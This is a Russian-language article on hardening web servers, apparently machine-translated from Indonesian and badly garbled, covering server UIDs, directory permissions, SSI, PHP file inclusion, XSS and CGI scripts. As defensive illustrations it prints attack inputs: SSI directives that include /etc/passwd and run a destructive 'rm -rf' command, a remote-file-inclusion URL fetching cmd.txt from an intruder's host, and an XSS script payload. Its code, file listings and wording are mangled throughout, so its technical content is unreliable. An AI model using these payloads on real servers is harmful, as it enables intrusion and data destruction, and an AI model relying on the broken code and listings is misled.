Введение

В мире информационных технологий, в частности, термин Internet World Wide Web (WWW) не чужды наши уши, World Wide Web является система обмена информацией через Интернет. Веб построен через программу под названием Web-сервер, который делает информация может быть доступна в сети. Умеренно доступа или отображения информации, хранящейся на серверах мы используем веб-браузеров (IExplorer, Opera, Mozilla, Netscape и т.д.).

World Wide Web была изначально разработана как система для физиков для своих целей исследования. Сегодня все больше и более широкому внедрению WWW и практически охватывает все аспекты жизни, включая бизнес, правительство, религиозное образование, социальное и культурное, и даже для личных интересов.

Из-за сложности этой использования World Wide Web, он не будет удивлен, если ВСП сала услуг, которые часто становятся жертвами злоумышленников с поличным, как не WWW огромные инвестиции, и высокой стоимости, и люди часто пользуются ее различными способами.

Несколько причин,

WWW является одним из самых популярных услуг в сети Интернет. Но, как я упоминал выше, он стал мишенью большинства из нападавших и вторжений, многое так, чтобы они lakukakan он будет преподавать. Некоторые вещи, что причиной является:

• Злоумышленник может воспользоваться ошибок в веб-сервере или через CGI скриптов в попытке получить доступ к системе.
• Конфиденциальная информация в веб-сервер может распространяться неуполномоченным лицам
• Конфиденциальная информация, которая передается между веб-серверов и браузеров могут быть перехвачены и постучал.
• Ошибок в веб-обозревателе (или какие-либо функции, что мы не знали) позволяет информация секретной информации в веб-клиенте могут быть похищены вредоносным веб-серверов
• Некоторые организации считают необходимым использовать специальную веб-технологий (например, программы и лицензионного программного обеспечения) в целях удовлетворения своих потребностей. Программы или программного обеспечения, который часто приносил новые недостатки безопасности

Запуск Secure Server

Веб-серверы предназначены для приема различных запросов от хозяев бесплатный интернет, а также отвечать на информационные запросы, которые в течение короткого времени. Они могут стать воротами информация является общественным благом и личной. Чтобы построить безопасный сервер в различных платформах. Вы должны рассмотреть важные вещи ниже:

• Пользователи должны выполнять программы, никогда не беспорядочно или команды оболочки на вашем сервере
• CGI сценарии выполняются в ваш сервер должен установить функции приема и отклонения (сообщение об ошибке). Сценарии также прогнозирования возможности вредных материалов.

После заседания обсудят различные методы для обработки вышеперечисленным вопросам.

UID Server

Веб-серверы обычно запустить суперпользователем. Поскольку сервер работает как корень, чтобы он мог услышать просьбу-запрос в порт 80, стандартный порт HTTP.

После того, серверы dijalankanm он изменил свою UID с именем пользователя, указанного в файле конфигурации. На сервере СНП, это конфигурационный файл httpd.conf.

Установка имени пользователя в httpd.conf может быть:

# Пользователей / групп: имя (или # номер) пользователей / групп для запуска HTTPD как.

Пользователь HTTP

Группа HTTP

В приведенном выше настройки, пользователи и группы, которые вы poloh не должно быть корней. Кроме того, предполагается, пользователь и группа не имеет специальный доступ к серверу.

* Примечание

Не запускать ваш сервер как корень! Хотя ваш сервер должен запускаться с правами суперпользователя в первый раз, httpd.conf файл не должен содержать суперпользователя. Если все будет сделано, то любой осуществляет веб-сервер будет работать как суперпользователь, возможность привести к потенциальным проблемам.

Понять сервера структуры каталогов

Строительство хороший сервер должен быть обеспечен представление о структуре вашего каталога документов. Веб-сервер, на самом деле, всегда в сотрудничестве с другими программными продуктами, где программное обеспечение часто носите умолчанию каталоги.

Вы, как системные администраторы, веб-разработчикам следует напомнить, что они обращают внимание на аспекты безопасности их структуру каталогов. Убедитесь, что разрешения-разрешения на каталог и все его содержимое соответствует тому, что требуется. Не позволяйте вашей пользователей в системе можно прочитать или изменить их.

Pasa СОНП сервера Есть шесть каталог по умолчанию, которые часто встречаются, а именно:

CGI-BIN: CGI сценарии магазины

конф: Сохранить настройки сервера файлы

htdocs: Сохранение веб-документы

иконы: Сохранение веб-документы / Имидж

журналы: Запись рекорд активности сервера

Поддержка: Сохранение Справочная программ для серверов

Многие источники рекомендуем создать пользователя и группу которая будет называться WWW, которая может быть использована для управления через веб-сервера:

drwxr-XR-х 5 WWW WWW 8 августа 1056 00:01 CGI-BIN /

drwxr-х-2 WWW WWW 11 июня 1077 17:21 конф /

-RWX --- 1 WWW WWW 229 564 8 мая 21:58 HTTPD

drwxrwxr 2-х WWW WWW 8 августа 1294 00:01 htdocs /

drwxrwxr 2-х WWW WWW 3 июня 3211 21:15 иконки /

drwxr-х - 2 WWW WWW 4 мая 1168 22:23 журналы /

Файлы конфигурации

В конф каталоге представлены СОНП конфигурации сервера файлов и наследники

access.conf: Управление доступом к файлам сервера

httpd.conf: Файл конфигурации сервера

mime.types: Определение отображение расширения файла расширение для типов файлов, MIME.

Файл конфигурации: ресурсов Карта Server. Этот файл содержит дополнительную информацию о конфигурации сервера. SRM объяснить корня документа, независимо от того, как пользователь каталога веб себе, которая используется для listning значок каталог, места scripr CGI, директора-директора документ, и сообщения об ошибках.

Таким образом, информация в этих файлах может быть использовано для подрыва сервере или в системе, то рекомендуется только администратором memproteksinya вы имеете право читать и изменять его:

-RW --- 1 корень колеса 954 6 августа 1:00 access.conf

-RW --- 1 корень колеса 6 августа 2840 1:05 httpd.conf

-RW --- 1 корень колеса 6 августа 3290 00:30 mime.types

Rw-1 корень колеса 4160 --- 26 сентября 11:00 файл конфигурации

Дополнительные вопросы конфигурации

Кроме того, извините, настройки разрешения, необходимо также рассмотреть следующие вопросы:

Автоматические списки каталогов

Большинство веб-серверы обычно автоматически отобразит список каталогов, если Существуют файлы не index.html, index.shtml или index.php. Такая ситуация может привести к проблемам tentuk безопасности, в котором его можно использовать, чтобы найти слабые файлов, содержащихся в системе. Таким образом, важно, чтобы Вы вписали свое index.html файла в каждой директории, или если это невозможно, вы можете menggunakkan перенаправления скрипты или программы, которые широко доступны в Интернете.

После символической ссылки

Избегайте использования символических ссылок не входящим в структуру веб-документах. Лицо может получить доступ через веб-сервер для создания другого документа на компьютере с помощью символических ссылок. Кроме того, необходимо установить параметры, чтобы сервер символические ссылки sombolis ссылки доступны только для владельцев этих связей.

Server-Side Includes

Server-Side Includes (SSI) является директивой, которые могли бы быть включены в документ HTML. Включения на стороне сервера используются для вставки других документов, или для выполнения определенных документов и отображает результаты. С SSI, вы можете отобразить информацию, такую как дата и время автоматически в зависимости от времени параметров системы. Новостные сайты часто используют эту функцию, чтобы направить эти документы в HTML страницах новостей они все время меняются.

Ниже приведен пример применения SSI НЕ МОЖЕТ произойти на своем сайте, поскольку это может показать пароль файловой системы (/ и т.д. / пароль) на веб-страницу:

<! - # Включить файл = "/ и т.д. / пароль">

<! - # Exec стй = "РМ и РФ / и; кот / и т.д. / пароль">

в то время как второй сценарий будет удалять любые записи файлов в системе, которая, в свою очередь, также планирует начать информация / и т.д. / пароль.

URL инъекций исполнения

URL инъекций исполнения является одним из дорог или пробелы, которые часто используются злоумышленниками для входа на сервер или на сайте администрации, это связано с источником исходным кодом, созданный веб-администратору управлять его веб-сайт. Портал сайты часто имеют щели для URL этой инъекции.

Некоторые способы, которые часто используются в случае вторжения URL раствор для инъекций, в том числе:

- PHP инъекции исполнения

Инъекции PHP обычно происходит из-за халатности веб-программиста в разработке код-код программы. Вот пример кода, которая не лучше в веб-сайта;

<?

Если ($ выберите == "")

(

включить "main.php";

) Else

(

включить "$ pilih.php";

)

?>

Приведенный выше код позволяет злоумышленникам выполнить файл, который находится за пределами сервера.

http://www.site-anda.com/index.php?pilih=http://www.penyusup.com/cmd.txt?&cmd=id

Для преодоления этого необходимо обратиться в службу веб-программист для barhati помощи в управлении код код сайта, или отключить эту опцию через safe_mode в php.ini на вашем сервере.

- XSS (Cross Scriptting Side)

Кросс Сайд Scriptting это ошибка, что популярным в наши дни, многие хакеры использовали эту ошибку, чтобы попасть в веб-администрирования представителей имеют эту ошибку. Этот способ написания кода с использованием тех же ошибку, как я упоминал выше.

Охранной образом использовать эту ошибку это вставить код Javascript или метку в URL Вашего сайта;

http://www.site-anda.com/index.php?pilih = <script> оповещения ('XSS нашли');</ сценария>

Инъекции результаты сверху появится предупреждение о существующих веб-страниц сайта на сервере.

Лучше всего, чтобы преодолеть эти проблемы одним из которых является компилировать код, который не позволяет пользователям выполнять HTML теги (в данном случае символ "<", ">" и др.).

Дать библия CGI-скриптов и программ в защищенном

Программы CGI / PERL часто создает проблемы с безопасностью, особенно в отношении SUID приложений. Веб-программисты часто делать или поставить выполнение программы CGI, которые предоставляются услуги для пользователей, но не знал об этих программах фактически поставить под угрозу безопасность сервера. Поэтому, если вы веб-разработчик (в частности) должны быть осторожны с установкой этих скриптов.

Некоторые вещи, которые должны быть подчеркнуты в осуществлении программ CGI включают в себя:

- Настройка веб-сервера, с тем чтобы CGI сценарии расположены чуть ниже, в одной директории (обычно называемые CGI-BIN или бин)

- Используйте программы, как Tripwire для мониторинга изменений в сценарии не действует

- Применить ограничения доступа к каталогу и его содержимое, местные пользователи не должны иметь возможность установить, изменить или удалить существующие сценарии, не модерируются. Кроме того, необходимо, чтобы предотвратить эти сценарии доступа для чтения, чтобы избежать кого melalukakn слежка.

- Исключите резервного копирования файлов автоматически генерируются редактора. Многие системные администраторы используют текстовый редактор, например Emacs для редактирования сценариев находятся на сервере. Эти резервные копии могут быть выполнены нарушителя причиной проблемы.

- Убедитесь, что каталог и CGI скриптов исполняемый ТОЛЬКО разрешения (например, 755 или 751), а также kepemilikkannya как это и должно быть.

- Убедитесь в том, чтобы удалить образец образец или резервную копию ваших CGI скриптов, по крайней мере, вы сохраните их на отдельном носителе.

- Выполнить аудит проблемных практике программирования через вспомогательный инструмент

Таким образом, краткое описание веб-безопасности, и такие методы, которые можно использовать для защиты сервера от людей, которые не несут ответственности, я надеюсь, что эта статья может быть полезной для вас.

Ключевые слова:

• Основные файлы конфигурации сервера СНП (5)
• определить существующие функции безопасности на сети WAN (4)
• доступа функции конф (4)
• определить функции - функции почтового сервера (3)
• Конф SRM (3)

Читайте также:

• Информация Virus - Worm: VBWorm.gen3
• Осторожно, вирус Воры клиентов банкоматов данных
• За мошенничество системы организации воздушного